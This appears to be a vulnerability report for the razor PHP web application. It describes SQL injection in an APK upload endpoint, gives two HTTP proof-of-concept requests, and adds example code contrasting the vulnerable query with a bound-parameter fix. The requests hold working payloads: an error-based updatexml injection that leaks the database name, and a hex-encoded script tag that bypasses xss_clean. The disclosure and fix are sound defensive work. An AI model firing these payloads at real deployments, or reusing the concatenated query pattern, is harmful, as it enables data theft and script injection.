```php
// ChannelModel::updateapk: $description (and the other values) are interpolated into the SQL string
$sql = "update ".$this->db->dbprefix('channel_product')." set updateurl ='$updateurl' , description='$description' ,version='$versionid',date='$date' where cp_id = $cp_id and user_id = $userid";
$this->db->query($sql);
$affect = $this->db->affected_rows();
```
PoC (assume a product with ID 1 exists):

```http
POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="userfile"; filename="base.apk"
Content-Type: application/octet-stream
......
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="versionid"

1.4.0
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="description"

xxxx' or updatexml(1,concat(0x7e,(select database())),0) or '
-----------------------------4510835592045788119549478332--
```
XSS can also be triggered through manipulated error messages.
Techniques such as hexadecimal encoding in SQL can be used to bypass CodeIgniter's xss_clean function.
```http
POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="userfile"; filename="a.apk"
Content-Type: application/octet-stream
......
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="versionid"

1.5.0
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="description"

xxxx' or updatexml(1,concat(0x7e,(select 0x3c7363726970743e616c6572742831293c2f7363726970743e)),0) or '
-----------------------------94712324341088669424272486117--
```
Hi, I want to report a SQLi vulnerability.

In razor/web/application/controllers/manage/autoupdate.php (line 187 in 2c991af), `$description` is controlled by users and has few restrictions on its format. In the ChannelModel::updateapk method, `$description` is inserted into SQL directly (razor/web/application/models/channelmodel.php, line 482 in 2c991af).
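The vulnerable UPDATE beside a bound-parameter form, plus a decode of the hex literal from the second PoC, as an added example that is not part of this issue or of razor's code. It uses PDO with an in-memory SQLite table (a constructed sample row) instead of CodeIgniter's `$this->db`, so it runs stand-alone with php-cli and the pdo_sqlite extension; the table layout and the `updateApkVulnerable`, `updateApkSafe` and `decodeHexLiteral` function names are assumptions made for the example.

```php
<?php
// Added example, not razor's code. Reproduces the string-concatenated UPDATE
// from ChannelModel::updateapk against an in-memory SQLite table (constructed
// sample data), then the bound-parameter form that neutralises the PoC payloads.
// Requires php-cli with the pdo_sqlite extension. Table/columns are assumed.

// Build and run the UPDATE the way the issue's snippet does: the untrusted
// $description is concatenated straight into the SQL text.
function updateApkVulnerable(PDO $db, int $cpId, int $userId, string $description, string $versionId): int
{
    $sql = "update channel_product set description='$description', version='$versionId'"
         . " where cp_id = $cpId and user_id = $userId";
    return $db->exec($sql);   // a single quote in $description ends the literal and the rest is parsed as SQL
}

// Hardened form: placeholders are bound, so $description can only ever be data.
function updateApkSafe(PDO $db, int $cpId, int $userId, string $description, string $versionId): int
{
    $stmt = $db->prepare(
        "update channel_product set description = :description, version = :version"
        . " where cp_id = :cp_id and user_id = :user_id"
    );
    $stmt->execute([
        ':description' => $description,
        ':version'     => $versionId,
        ':cp_id'       => $cpId,
        ':user_id'     => $userId,
    ]);
    return $stmt->rowCount();
}

// Decode a MySQL-style 0x... literal. MySQL turns it into a string at query
// time, after xss_clean has already inspected a request body containing only
// hex digits, which is why the filter never sees a tag.
function decodeHexLiteral(string $literal): string
{
    return hex2bin(substr($literal, 2));
}

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec("create table channel_product (cp_id integer, user_id integer, description text, version text)");
$db->exec("insert into channel_product values (1, 1, 'initial', '1.0.0')");   // constructed sample row

// The description value from the first PoC request.
$payload = "xxxx' or updatexml(1,concat(0x7e,(select database())),0) or '";

try {
    updateApkVulnerable($db, 1, 1, $payload, '1.4.0');
} catch (PDOException $e) {
    // SQLite has no updatexml(); the point is that the payload reached the
    // parser as SQL rather than as a string value.
    echo "vulnerable query was parsed as SQL and failed: " . $e->getMessage() . PHP_EOL;
}

updateApkSafe($db, 1, 1, $payload, '1.4.0');
$stored = $db->query("select description from channel_product where cp_id = 1")->fetchColumn();
echo "bound query stored the payload verbatim: " . var_export($stored === $payload, true) . PHP_EOL;

// The hex literal from the second PoC, and how it should be rendered if it
// ever ends up in an error message shown to a browser.
$hex     = '0x3c7363726970743e616c6572742831293c2f7363726970743e';
$decoded = decodeHexLiteral($hex);
echo "hex literal decodes to: " . $decoded . PHP_EOL;
echo "rendered with output encoding: " . htmlspecialchars($decoded, ENT_QUOTES, 'UTF-8') . PHP_EOL;
```

In the CodeIgniter model the equivalent fix is to pass the values as query bindings, for example `$this->db->query("UPDATE ... SET description = ? ... WHERE cp_id = ? AND user_id = ?", array($description, $cp_id, $userid))`, instead of interpolating them into `$sql`; `affected_rows()` still works afterwards. The literal `0x3c7363726970743e616c6572742831293c2f7363726970743e` decodes to `<script>alert(1)</script>`, so filtering the request with xss_clean cannot catch it; escaping with `htmlspecialchars()` wherever a database error message or the description is written into HTML is what stops it from executing.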